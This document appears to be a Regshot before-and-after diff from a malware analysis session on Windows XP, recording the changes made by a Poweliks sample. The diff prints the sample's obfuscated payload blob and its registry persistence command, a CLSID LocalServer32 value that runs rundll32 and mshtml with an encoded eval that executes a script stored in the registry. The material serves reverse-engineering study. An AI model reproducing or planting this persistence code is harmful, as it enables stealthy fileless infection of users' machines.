z1yr327FH%-"ZO2SH,yJXOAiZO Jf1\NH0\gX,~i/,yS2m-Nz071z,~iZO Jf1\Nz071z,~i;,+d&1\NH%7HXR\[!5\HzRcjG4pdX/7[Tp71H%*j945Sz/7[!5\HzRcj945Sz/7[Zp-gXRcjGt5JXk\Jy4AJzk\SZ}\"Z%7[%t~SH/-ST}7I/%7[L4AJzk\ST}7I/%7[Nt$dXk\SZp7]ZR\[kR\}#z\Nb1&d&m7J"m7pjb-Nr12Sfm7Jy1\}#z\Nr12Sfm7J.m-5.z\Nb,2J&1\Jy1\Jf92S.^\}sbWi/%MS2N3S"^7robWiZRDJf92S"^7robWi;%.d&92S.m76szciZRDJzRcpU0DdX,AJTp7S25*pj0MSz,AJ!5\JfIcpj0MSz,AJZp-d&IcpU%MJXO2J!5\JfI\SZopd&57[z,2SH%fSTo5Sf57[XO&JzR&STo5Sf57[H,fdXR&SZs5J&I\[XO&JzR&SH1&"Z%2J"t5rwb-|z12I/%2Jy4p6oz\|z12I/%2J.t}}sz\|H,2]ZR&Jy4p6oz\|H0\}227Fz%7I;,3Sz1yr327FXR\]/O2Sz1yr327FH%-"ZO2SH,y62A\FXR\]/O2SH1 d&N~i/,yS2m-Nz071z,~iZO Jf1\Nz1WNht"i..$`3wANZIat O3}!w1j3wArA1AgMV_Cs9_KAs$.#]	4TYACC9S]h9I?q$;1oNnC0s$\FwC}yN_PM4\j!jW\owf}8]V`2s"}qIwjsB}qsM?V9"8j4Zi	9C}"]"p+tx]`N2(FwApj9d]3j?^F~At+9Wpq1L`3N"H3,w?qNo}+1oKhV2e!g2H!9s}"t4p+t7P`9$9FwMpj9d	2g|]!8;HowMpqBCUM3Z6otMNZsP}+[	I	t\^!4Z}iwC}+1gp+WZ8`s/1sw2p^sGP3jCCM9L#3\Ip`2A9 sn}Tsh?AHTpis	N+sdCfjCtTx&.i]GpjY4i`.]5j82p0s4} 4\]!9W[Tw2p0o\F.xP
i}	1Vs\p	[~IhNx#j4W	ijnl3oG?+NUt`YU\!DCj`tj}j"&Pj"AtfjS}8oC"j9xjTw;Nys!pP]"IiI2j!gxi#j|p+[Xjis2}`N2`gMpot7}j8\P!\pt"xrI:].5jt	8qA;I_mqKT4a1u.~C!^xPixI.T#$p+N~PZ1dMjIp`s7]x~ACjgq		9I48oF::VgCTs_N2}/Ih42p	NN\&\*J"4L}/12pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5.~2jjV	jjwA}jwA}iwAp`oqV9\tT62HANBpz1}phV~t!wA}iwApio~pisatA}25(\vjjV	jj`h#!^f}iwAp`oA5js~}i14HwNBpTB}IhV~t&a?		99pio~pis~}`s$5jD5j^V	jjZh#!^f]VlMl`ox5js~}is~p`s$ppilIhV~Cs"?		995"$o?i1~}`s$5jwAp`s~]M&h#!^fj3lMl`owjs9\tTV~p`s$pio~pis~ifg?		99l"$o?i1tP0}259Ap`s~}jwA}jwAj9^|l`owV9\tT3SHwNBpTo~pis~}jwA}iwA|"$D?i1}P0}25avj^V	jjwA}jwA}iwAp`oC`s1\tT3WHwNBpqB}IhV~t!wA}iwApio~piss[Aw25Djj
^V	jjwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~]:a?		9|m%$o?i1~}`s$5japj^V	jjwA}jwA]iwApq[A5js~}i1WHwNBpTo~pis~P\?		99pio~pi28[A}259Ap`s~}jkh8j^f}iwAp`of(V1\tTV~p`s$p#HZ?hV~t!wA}iwZN"$D?i1~}`s$5j^;j8V	jjwA}jwA}iwAp`oA5js~}is~p`s$pio~pVtm	sxre%x?H	B_.VV\#...I39p0s~}jw?\VIh#i4|N^Vh":Ymj3wk5.1Hp#\S.s1`CF\1Ppa9N#Bw+3F~].jAq39cmZ6Dixgk}jwA}i9MHV(Xm!sq\iFl_wH+iaDjU1b}jxjiTjcooqpVwt8j9"I3wAp`sVPL~L82Whe+Dspjeh(2,:#P.V.0Hql+B_NTs~}jx|ehl?4!HD1	60]`*Xq.9rm^}IjxgIijxK#ijrj8t2`(.m]ft.p`s$p#tI.UAm]jl*	s9MHo2qKh6N	w}dI:l?mwVo[!wt#ywW	%x4yBq5(.m]ft.p`s$p#3Hl!6\\x"jto16KssIpUNm#89uI.9c4AsV}V"I#3x|P!D?Kj]A5js~]	Ik}Ajal!H&ph6m].aheV9KqsoH	6q[Z9	jK~j89jH.9H8.xyeVwAp`os:xVm#T5S^.	N	]D4uVb\Lj!	s1FHooD+u}\\	1$`.j?.8sq}3a1n3^F	V9cmZoA5jsj8#}!j:9*Nh\H.V6m	MDAe%xc43q+?p.m]2t"5jwApj2H6jak8She#9Mmyo51M6~]TI7p`s$pioV}T}![!^A}i^yNT37pp92jo5.qxAypNI~njX*]3g!j"4xIG4}93Vq\i}nlqY]1iB7}T.g	sTXCP^tKuGMl!1~}`s$qMX\m	NxC!j1^VwIj"^Am	sj93YNn	stHss*pV2519oyjs4*iP"ppVBdH362jVNu:y4|+N.^^!9A62W!\f9ppZdc:!wU[UwHHo.Upio~pisIH
24qCsz\Sz02IuAX^sVr59Apo2Mt!wA}jwA#Tw.5Zox5j2yipNGp`s/.hVM+ip2}VgS}	X}+%sMP.0iqVFjM\f?`s\8fADP.aMJf9AjV4F:j9~}i9`.NI/rj12pTYA]2Kh]3^hIiq	?32yijI$g2wI?2Vwej"ltVwACi`y|Z}&q357HuplpZ1+13075qA	H3wZ}iwfIps"|TwV[Z.$5j^ZrU,2}!Xq]2Kh}P4qm0B9UMW7J"t5p`.4phtsli9G}jwACjO!+Vs}?u5l^ZF/\2xKpNj7624A}jw263^q?V[I5js~jiqXS2N(ms\Zj!*sF&"MtzD1Iu[^r31	F21$\2"3KVIGt2X3}V\Hto"SpNi\dX,~[T1}}AI$ph[N}39U}jwAH%TDp%i7r/,~}`1/f~sI`s~}31 n29ZHjRcIAoA5jpWj#A&jq.q+h^M5z,UH2&*Jf9ZH3H"|"1&]A6/gx9jm0IAiMxl8&gLP	Oqlb1&}2s~}j/Hjs5.p	]sr39~J!gH[""p}T}Zj9IA\8s!mV\xIG}+C29xtxI\]u9Apq]Am3qy[q1AN2t\mVGZp%37[!&h]o^yIiq.?!,;}8o-d&9Ap:}2i.~![Fw*ihRX`#I"js~]	s;|2t$pVo"p%AIHC"MFTg ?!40N9A"82pX}2wp?VVq\&gw\Kt!C	9;S8B:m227\91.l`sf}h]^|TY`tL9XjV^Zrj12p#AZC_NX\2Ahj_IMi(^Ae!4X}V8q}ZBA9VVa\"HZl:AeNz0S9Ia}x1!iUI*I%s}I!t	\.HA5!^WKb,	F!8Y[L1\JzD!?0Tc5KIUt%3SI:IAIiqy+VNUtL4Ajh\&pio~I3qZ}j}ugx9c4q3Si(0Dn.4A]u9Ap:$V5!pZ	9tA+`3aIiH"li}2jsw(Cp9&+	VXH"Ia\.1f\y~51A9xi29Z]^|]3&*H:txny9UtrYt.wsUmUsANUtAH2^WJfI\SqLXNi6Utstsg9I`sh8VjHKt*n3"6}
;1K\!9~}is~I`s$piotphV~t!wA}ixApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}KZ,(r0Gf}Gxq.a8	p"tVDN(Ub08&z,\fk1/L0W8H*1&I^8j*UNq*Tl	q^SVV![MjX8f~K}pByl	1^^H*HI(xylVskpKKv] j!]!j/}q[t9M.V8f9VNq*%N!s74sA7Cl!tp&W|![4q!Y^^s*s(ftXSsIk8Z~C(x![	w/j_B\9M.N[/3k|VNVq3)KT9l[Mj4p#Z/q#x4Up.\^!dqFj94	p.\VZ/	Fj98U5yH^ONo?3TFoYx4	I}NuB9|j3aF?l98U\\l+iK9ubkB_b;:MjE}2IKJf~cHfz/B!Oh|:d1;o3K	q1lm2Is4jXUN	*ZC8VJV^EN!#H4fA:to9+mgVmH*ge(xyCMw/pPKvIy#!"M.kt	N4NV.!4fBVN	*N[M^\8s~\l	XZ}pqKFVN4&Cjy}oq.\kl38MSo}+w/4w[w(:I7[qAH4y1$|jAK}+pT}Z44}U^!}#O9(j6(}	VT\.DN(U6(#j^E[ftXpjX4.`sE9fHHpj6(.`V;N9\H(j3TFsD98U"pNuB9|j3aFU*B(x\\lyjKBCz/BCz/\/ShSG)w}h!nW}!n5ysT5+LgZU/g/xZ1/Ug/}	#S|92a6S!F\(4wNG/{v#*#Ei@#@&77'lc]E	`w3E~k6,^nx-lmJS!Bq#p@#@&7)@#@&7^
mY^tvn*@#@&i	@#@&d)@#@&N@#@&msWk+cbp56wqAA==^#~@"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_RASMAN\0000\Control\ActiveService: "RasMan"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_TAPISRV\0000\Control\ActiveService: "TapiSrv"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RASMAN\0000\Control\ActiveService: "RasMan"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TAPISRV\0000\Control\ActiveService: "TapiSrv"
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\i: "C:\Documents and Settings\Kwapa\Pulpit\screenshots\regshot_2ndShot.bmp"
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\33:  72 00 65 00 67 00 73 00 68 00 6F 00 74 00 5F 00 32 00 6E 00 64 00 53 00 68 00 6F 00 74 00 2E 00 62 00 6D 00 70 00 00 00 60 00 32 00 00 00 00 00 00 00 00 00 00 00 72 65 67 73 68 6F 74 5F 32 6E 64 53 68 6F 74 2E 6C 6E 6B 00 3E 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 72 00 65 00 67 00 73 00 68 00 6F 00 74 00 5F 00 32 00 6E 00 64 00 53 00 68 00 6F 00 74 00 2E 00 6C 00 6E 00 6B 00 00 00 22 00 00 00
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\8:  72 00 65 00 67 00 73 00 68 00 6F 00 74 00 5F 00 32 00 6E 00 64 00 53 00 68 00 6F 00 74 00 2E 00 62 00 6D 00 70 00 00 00 60 00 32 00 00 00 00 00 00 00 00 00 00 00 72 65 67 73 68 6F 74 5F 32 6E 64 53 68 6F 74 2E 6C 6E 6B 00 3E 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 72 00 65 00 67 00 73 00 68 00 6F 00 74 00 5F 00 32 00 6E 00 64 00 53 00 68 00 6F 00 74 00 2E 00 6C 00 6E 00 6B 00 00 00 22 00 00 00
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Xjncn\Chycvg\cbjryvxf\1o2r2950775qn5o0op23ooq4n8s18qps1o6npron611n50osn3nq608865823531.rkr:  0E 00 00 00 06 00 00 00 30 5B 21 4B 81 45 D1 01
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Kwapa\Pulpit\poweliks\1b2e2950775da5b0bc23bbd4a8f18dcf1b6aceba611a50bfa3ad608865823531.exe: "1b2e2950775da5b0bc23bbd4a8f18dcf1b6aceba611a50bfa3ad608865823531"

----------------------------------
Values modified: 18
----------------------------------
HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\: "C:\WINDOWS\system32\wbem\wmiprvse.exe"
HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\: "rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDS]]dmtje]]|84f81:fb.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))"
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed:  EB 2D 4C 30 58 FD 8E 6E 11 F8 D4 5F 13 A1 27 71 29 60 0C C8 12 29 20 12 2F C7 30 F6 7E B8 D5 47 30 F2 86 16 34 F9 F9 1C 92 D8 DF D6 82 BE 4D 59 D6 1B 3E A2 FD 3C 7A 1A 16 08 64 84 E3 64 01 64 19 42 14 BD 0B 57 AC 9B 12 92 D7 90 9A 31 51 1F
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed:  5C 34 EA EF 55 E4 D4 C2 EF 1F 4E 73 38 94 1A 17 62 25 46 9C F6 2B 7F 4F E9 D2 BE 9C FF 7F 63 7D 69 BE 8E 49 83 0C 4D ED 47 AB 75 6E 82 37 C7 31 C8 BF CD A7 B7 49 07 06 1C EA C1 35 CA C4 96 4E D3 49 89 F3 30 C3 27 8C DF 68 B3 0E 32 E3 6C 36
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File1: "C:\Documents and Settings\Kwapa\Pulpit\screenshots\regshot.bmp"
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File1: "C:\Documents and Settings\Kwapa\Pulpit\screenshots\regshot_2ndShot.bmp"
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File2: "C:\Documents and Settings\Kwapa\Pulpit\screenshots\PEview_importy.bmp"
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File2: "C:\Documents and Settings\Kwapa\Pulpit\screenshots\regshot.bmp"
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File3: "C:\Documents and Settings\Kwapa\Pulpit\screenshots\PEview_ISH_rsrc.bmp"
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File3: "C:\Documents and Settings\Kwapa\Pulpit\screenshots\PEview_importy.bmp"
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File4: "C:\Documents and Settings\Kwapa\Pulpit\screenshots\PEview_ISH_data.bmp"
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File4: "C:\Documents and Settings\Kwapa\Pulpit\screenshots\PEview_ISH_rsrc.bmp"
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\MRUList: "febdcajgih"
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\MRUList: "hfebdcajgi"
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\h: "C:\Reversing\CrackMe\crackme2015\EsetCrackme2015.dll"
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\h: "C:\Documents and Settings\Kwapa\Pulpit\screenshots\regshot_2ndShot.bmp"
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\MRUList: "hgfedcba"
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\MRUList: "ihgfedcba"
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\MRUListEx:  19 00 00 00 20 00 00 00 1F 00 00 00 1E 00 00 00 1D 00 00 00 1C 00 00 00 1B 00 00 00 1A 00 00 00 18 00 00 00 0F 00 00 00 17 00 00 00 13 00 00 00 0C 00 00 00 16 00 00 00 15 00 00 00 14 00 00 00 12 00 00 00 11 00 00 00 10 00 00 00 0A 00 00 00 09 00 00 00 0E 00 00 00 0D 00 00 00 0B 00 00 00 08 00 00 00 07 00 00 00 05 00 00 00 04 00 00 00 06 00 00 00 03 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\MRUListEx:  19 00 00 00 21 00 00 00 20 00 00 00 1F 00 00 00 1E 00 00 00 1D 00 00 00 1C 00 00 00 1B 00 00 00 1A 00 00 00 18 00 00 00 0F 00 00 00 17 00 00 00 13 00 00 00 0C 00 00 00 16 00 00 00 15 00 00 00 14 00 00 00 12 00 00 00 11 00 00 00 10 00 00 00 0A 00 00 00 09 00 00 00 0E 00 00 00 0D 00 00 00 0B 00 00 00 08 00 00 00 07 00 00 00 05 00 00 00 04 00 00 00 06 00 00 00 03 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\MRUListEx:  07 00 00 00 06 00 00 00 05 00 00 00 04 00 00 00 03 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\MRUListEx:  08 00 00 00 07 00 00 00 06 00 00 00 05 00 00 00 04 00 00 00 03 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:  0E 00 00 00 85 00 00 00 10 42 1D 24 81 45 D1 01
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:  0E 00 00 00 87 00 00 00 30 5B 21 4B 81 45 D1 01
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG:  0E 00 00 00 28 00 00 00 50 AD 5D 33 81 45 D1 01
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG:  0E 00 00 00 29 00 00 00 E0 80 2D 46 81 45 D1 01
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACVQY:  0E 00 00 00 44 00 00 00 10 42 1D 24 81 45 D1 01
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACVQY:  0E 00 00 00 45 00 00 00 C0 9A 10 41 81 45 D1 01
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACVQY:%pfvqy2%\Nxprfbevn\Cnvag.yax:  0E 00 00 00 0D 00 00 00 10 42 1D 24 81 45 D1 01
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACVQY:%pfvqy2%\Nxprfbevn\Cnvag.yax:  0E 00 00 00 0E 00 00 00 C0 9A 10 41 81 45 D1 01
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\zfcnvag.rkr:  0E 00 00 00 0D 00 00 00 10 42 1D 24 81 45 D1 01
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\zfcnvag.rkr:  0E 00 00 00 0E 00 00 00 C0 9A 10 41 81 45 D1 01
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings:  46 00 00 00 0D 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 70 7E 1F BD 57 9C D0 01 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 0A 00 02 0F 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings:  46 00 00 00 0E 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 70 7E 1F BD 57 9C D0 01 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 0A 00 02 0F 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx:  0E 00 00 00 10 00 00 00 0B 00 00 00 00 00 00 00 03 00 00 00 0F 00 00 00 0D 00 00 00 0C 00 00 00 0A 00 00 00 08 00 00 00 09 00 00 00 06 00 00 00 01 00 00 00 02 00 00 00 07 00 00 00 05 00 00 00 04 00 00 00 FF FF FF FF
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx:  10 00 00 00 0B 00 00 00 0E 00 00 00 00 00 00 00 03 00 00 00 0F 00 00 00 0D 00 00 00 0C 00 00 00 0A 00 00 00 08 00 00 00 09 00 00 00 06 00 00 00 01 00 00 00 02 00 00 00 07 00 00 00 05 00 00 00 04 00 00 00 FF FF FF FF

----------------------------------
Files added: 4
----------------------------------
C:\Documents and Settings\Kwapa\Pulpit\screenshots\regshot_2ndShot.bmp
C:\Documents and Settings\Kwapa\Recent\regshot_2ndShot.lnk
C:\WINDOWS\Prefetch\1B2E2950775DA5B0BC23BBD4A8F18-215DE415.pf
C:\WINDOWS\Prefetch\1B2E2950775DA5B0BC23BBD4A8F18-235FFFEE.pf

----------------------------------
Files deleted: 3
----------------------------------
C:\Documents and Settings\All Users\Menu Start\Programy\Autostart\desktop.ini
C:\Documents and Settings\Kwapa\Menu Start\Programy\Autostart\desktop.ini
C:\Documents and Settings\Kwapa\Pulpit\poweliks\1b2e2950775da5b0bc23bbd4a8f18dcf1b6aceba611a50bfa3ad608865823531.exe

----------------------------------
Files [attributes?] modified: 10
----------------------------------
C:\Documents and Settings\Kwapa\Cookies\index.dat
C:\Documents and Settings\Kwapa\NTUSER.DAT.LOG
C:\Documents and Settings\Kwapa\Recent\screenshots.lnk
C:\Documents and Settings\Kwapa\Ustawienia lokalne\Historia\History.IE5\index.dat
C:\Documents and Settings\Kwapa\Ustawienia lokalne\Temporary Internet Files\Content.IE5\index.dat
C:\WINDOWS\Prefetch\MSPAINT.EXE-11CBB631.pf
C:\WINDOWS\system32\config\software
C:\WINDOWS\system32\config\software.LOG
C:\WINDOWS\system32\config\system.LOG
C:\WINDOWS\system32\wbem\Logs\wbemess.log

----------------------------------
Total changes: 67
----------------------------------
